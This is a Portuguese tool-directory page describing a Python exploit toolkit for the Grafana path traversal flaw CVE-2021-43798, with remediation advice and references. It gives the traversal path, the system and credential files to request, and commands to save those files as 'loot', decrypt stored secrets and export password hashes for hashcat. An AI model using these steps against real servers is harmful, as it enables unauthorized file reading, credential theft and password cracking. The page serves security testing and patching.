Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-43798 — Kit de ferramentas Python para testes autorizados da vulnerabilidade de path traversal CVE-2021-43798 no Grafana, com PoC de leitura arbitrária de arquivos, descriptografia de segredos e exportação de hashes de usuários para avaliações de segurança. | Kitploit
Ferramentas/GitHubGitHub/okymi-x/cve-2021-43798
Quebra de SenhasFerramentas de Criptografia/DescriptografiaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de Informações
GitHubokymi-x/cve-2021-43798

CVE-2021-43798

Kit de ferramentas Python para testes autorizados da vulnerabilidade de path traversal CVE-2021-43798 no Grafana, com PoC de leitura arbitrária de arquivos, descriptografia de segredos e exportação de hashes de usuários para avaliações de segurança.

Ver Repositório
3há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-43798 - Leitura Arbitrária de Arquivos no Grafana

Kit de ferramentas Python para testes autorizados da CVE-2021-43798, uma vulnerabilidade de travessia de diretórios no Grafana que pode permitir leituras arbitrárias de arquivos sem autenticação por meio de caminhos de ativos de plugins.

Este repositório contém:

  • grafana_poc.py: PoC interativo de leitura arbitrária de arquivos que salva os arquivos baixados localmente.
  • grafana_pass_decryptor.py: utilitário para descriptografar segredos criptografados de fontes de dados do Grafana quando grafana.ini e/ou a secret_key estiverem disponíveis, e para exportar hashes de senhas de usuários do Grafana a partir de grafana.db.

Aviso

Use este projeto somente em sistemas que você possua, opere ou tenha permissão explícita por escrito para testar. A exploração não autorizada pode expor arquivos confidenciais, credenciais, chaves privadas, conteúdo de bancos de dados e hashes de senhas de usuários.

Resumo da Vulnerabilidade

A CVE-2021-43798 afeta as versões do Grafana de 8.0.0-beta1 até 8.3.0. As versões corrigidas são 8.3.1, 8.2.7, 8.1.8 e 8.0.7.

O problema é acessível por meio de rotas de ativos de plugins, como:

root@kitploit:~
/public/plugins/<plugin-id>/../../../../../../../../../../../../..<file>

Arquivos comuns solicitados durante a validação autorizada incluem:

root@kitploit:~
/etc/passwd
/etc/grafana/grafana.ini
/var/lib/grafana/grafana.db
/proc/self/cmdline

O acesso depende das permissões de sistema operacional do processo do Grafana.

Requisitos

  • Python 3.10+
  • requests
  • pycryptodome ou cryptography para descriptografia de segredos

Instale as dependências:

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt

Guia de Uso

1. Leia Arquivos com o PoC

Execute o PoC interativo contra um alvo autorizado:

root@kitploit:~
python3 grafana_poc.py -H http://target:3000 -o loot

No prompt, insira caminhos absolutos:

root@kitploit:~
Download file > /etc/passwd
Download file > /etc/grafana/grafana.ini
Download file > /var/lib/grafana/grafana.db
Download file > exit

Os arquivos baixados são salvos no diretório de saída, preservando uma versão segura do caminho remoto, por exemplo:

root@kitploit:~
loot/etc/grafana/grafana.ini
loot/var/lib/grafana/grafana.db

2. Descriptografe Segredos do Grafana

Se você tiver tanto grafana.ini quanto grafana.db, o descriptografador pode ler a secret_key do arquivo de configuração e tentar descriptografar segredos criptografados de fontes de dados, notificações de alerta e plugins:

root@kitploit:~
python3 grafana_pass_decryptor.py \
  --ini loot/etc/grafana/grafana.ini \
  --db loot/var/lib/grafana/grafana.db

Descriptografe um blob criptografado manualmente:

root@kitploit:~
python3 grafana_pass_decryptor.py \
  --secret-key SW2YcwTIb9zpOOhoPsMm \
  --blob R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==

Imprima JSON delimitado por quebras de linha:

root@kitploit:~
python3 grafana_pass_decryptor.py \
  --ini loot/etc/grafana/grafana.ini \
  --db loot/var/lib/grafana/grafana.db \
  --json

3. Exporte Hashes de Usuários

As senhas de usuários do Grafana não são segredos criptografados. Elas são hashes PBKDF2 com sal. Exporte-os da tabela user:

root@kitploit:~
python3 grafana_pass_decryptor.py \
  --ini loot/etc/grafana/grafana.ini \
  --db loot/var/lib/grafana/grafana.db \
  --users

Exporte apenas as linhas do modo 10900 do hashcat:

root@kitploit:~
python3 grafana_pass_decryptor.py \
  --db loot/var/lib/grafana/grafana.db \
  --users \
  --hashcat > hashes.txt

Remediação

Atualize o Grafana para uma versão corrigida:

  • 8.3.1 ou posterior para o branch 8.3
  • 8.2.7 ou posterior para o branch 8.2
  • 8.1.8 ou posterior para o branch 8.1
  • 8.0.7 ou posterior para o branch 8.0

Se a atualização imediata não for possível, o aviso de segurança do Grafana observa que colocar um proxy reverso na frente do Grafana que normalize os caminhos das requisições pode mitigar o comportamento de travessia. Trate isso como um controle temporário, não como um substituto para a aplicação de patches.

Referências

  • Exploit-DB 50581: https://www.exploit-db.com/exploits/50581
  • repositório de referência jas502n: https://github.com/jas502n/Grafana-CVE-2021-43798
  • Aviso de segurança do Grafana GHSA-8pjx-jj86-j47p: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
  • Postagem no blog do Grafana sobre a CVE-2021-43798: https://grafana.com/blog/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/
  • Registro da CVE no NVD: https://nvd.nist.gov/vuln/detail/CVE-2021-43798

Créditos

O PoC público original é creditado a s1gh no Exploit-DB. O fluxo de trabalho de descriptografia de segredos do Grafana é inspirado em pesquisas públicas e exemplos de jas502n/Grafana-CVE-2021-43798, com este repositório fornecendo um utilitário Python para laboratórios e fluxos de avaliação autorizada.

Baixar ferramenta